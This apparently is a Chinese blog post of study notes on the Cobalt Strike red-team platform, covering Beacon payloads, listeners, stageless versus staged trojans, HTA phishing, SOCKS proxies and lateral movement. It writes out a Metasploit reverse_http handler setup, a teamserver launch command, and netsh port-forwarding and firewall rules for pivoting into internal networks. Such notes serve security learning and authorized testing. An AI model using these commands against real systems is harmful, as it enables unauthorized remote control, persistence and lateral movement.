28.Cobalt Strike

Cobalt Strike

Cobalt Strike 简介

C/S 客户端+服务端

Cobalt Strike(简称 CS),商业级红蓝对抗渗透测试平台,多用于内网渗透、权限维持、横向移动,主流红队工具。

一、核心定位

  • 架构:C/S 客户端 + 服务端,团队多人协同作战
  • 用途:漏洞利用、木马远控、内网漫游、提权、流量代理、溯源反制
  • 适用:Windows/Linux/macOS 全平台被控

二、核心组件

  1. TeamServer 团队服务端

    程序中枢,承载流量、会话存储、任务转发,对外暴露 IP 端口,被控主机回连至此。

  2. GUI 图形客户端

    运维操作界面,创建监听器、生成木马、下发命令、管理上线主机。

  3. Beacon 被控载荷

    运行在目标机器的木马程序,接收服务端指令,执行命令、文件操作、屏幕监控等。

三、关键常用功能

  1. 监听器 Listener

    配置回连协议、IP、端口,支持 HTTP/HTTPS/TCP/SMB 等,避开封禁端口。

  2. 载荷生成

    产出 exe、powershell、dll、shellcode 等各类木马,适配不同上线场景。

  3. 基础远控

    执行系统命令、文件上传下载、进程管理、注册表操作。

  4. 权限提升

    本地提权获取系统最高权限。

  5. 内网横向

    哈希传递、远程桌面、WMI、SMB 远程访问,扩散控制范围。

  6. 流量代理

    搭建隧道,以被控机为跳板访问内网资产。

  7. 持久化

    开机自启、账号后门,长期维持访问权限。

  8. 信息搜集

    抓取账号密码、系统、网络、域环境信息。

四、通信特点

  • 默认间歇式心跳上线,隐蔽性强,降低被杀软、防火墙检测概率
  • 支持流量加密、流量混淆,规避流量审计
  • 可自定义心跳间隔、回包形态

五、常见使用流程

  1. 部署启动 TeamServer 服务端
  2. 本地客户端连接服务端
  3. 创建对应协议监听器
  4. 生成适配目标系统的木马载荷
  5. 植入目标主机运行,等待 Beacon 上线
  6. 下发指令,开展提权、内网渗透、数据获取等操作

六、风险与合规

  • 属于黑客工具,无合法授权测试、擅自入侵计算机系统触犯法律
  • 易被杀毒软件、EDR、安全设备查杀拦截
  • 攻防对抗中主要用于企业授权安全演练、漏洞自查

命令

./teamserver 192.168.152.33 hello     #./teamserver ip(本机) password  服务端 

./start.sh  客户端           #客户端服务端都在本机 ip不变 密码 hello

stageless 木马

什么是 Stageless?

Stageless = 无分段、单文件、完整直接上线的 Beacon

  • Staged(分段):

    先传一个小体积 loader(stager),再从服务端下载完整 Beacon(stage)

    → 容易被杀、不稳定、网络差就掉线

  • Stageless(无分段):

    完整 Beacon 直接打包在 payload 里,运行就直接上线

    → 更稳定、更隐蔽、免杀更好、内网穿透更强

CS 里 Stageless 长什么样?

你在 CS 里看到的这些,全是 Stageless:

  • Windows Executable (Stageless)
  • Windows Executable (S) (Stageless)
  • Windows Service EXE (Stageless)
  • Raw Payload (Stageless)
  • Beacon Payload Generator 里的 Stageless 选项

Staged 和 Stageless 到底差在哪?(最重要)

类型 体积 网络要求 稳定性 免杀
Staged(分段) 小 必须能连 CS 差 一般
Stageless(无分段) 大一点 断网也能运行 极高 极好

生成木马 选择监听器

上线木马

msf

use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.152.33  # msf所在主机的ip
set lport 7788    # msf所在主机自定义端口号
run

新建监听

office宏木马

office默认不开启宏

什么是 HTA 挂马?

HTA(HTML Application)是微软推出的一种可直接运行的 HTML 应用程序,它依托 mshta.exe 执行,本质上是一种 “伪装成网页的可执行程序”。

挂马的核心逻辑是:通过恶意 HTA 文件,利用其内置的 VBScript/JScript 执行任意系统命令、下载并运行恶意程序,从而实现权限获取、会话上线等目的。

  • 特点:无需用户手动保存文件,直接在浏览器 / 系统中打开即可执行代码;绕过部分安全软件的网页脚本拦截。
  • 常见场景:钓鱼攻击、内网横向移动、无文件落地攻击。

sock代理

SOCKS 是网络代理协议,常用 SOCKS4、SOCKS5
SOCKS5:支持账号密码、UDP、IP 解析,渗透最常用
作用:本机流量 → 代理跳板机 → 访问内网其他机器
用途:内网横向、扫描内网、远程连接、漏洞探测
https://cloud.tencent.com/developer/article/2148922

实现内网渗透

netsh端口转发

Windows 本机做流量中转,实现端口映射、内网穿透、流量转发
# 添加转发
netsh interface portproxy add v4tov4 listenport=监听端口 listenaddress=0.0.0.0 connectport=目标端口 connectaddress=目标IP

# 查看所有转发规则
netsh interface portproxy show all

# 删除单条规则
netsh interface portproxy delete v4tov4 listenport=监听端口 listenaddress=0.0.0.0

# 清空全部转发
netsh interface portproxy reset

netsh interface portproxy add v4tov4 listenport=9090 listenaddress=0.0.0.0 connectport=80 connectaddress=192.168.2.30

跳板机监听本机 9090 端口,把访问跳板机 9090 的流量,转发到内网机器 `192.168.2.30:80`

防火墙放行

# 放行监听端口
netsh advfirewall set allprofiles state on
netsh advfirewall firewall add rule name="port8888" dir=in action=allow protocol=TCP localport=8888 remoteip=any enable=yes

cobalt strike 提权插件

cobalt strike免杀


posted @ 2026-09-03 20:32  hello422000  阅读(14)  评论(0)    收藏  举报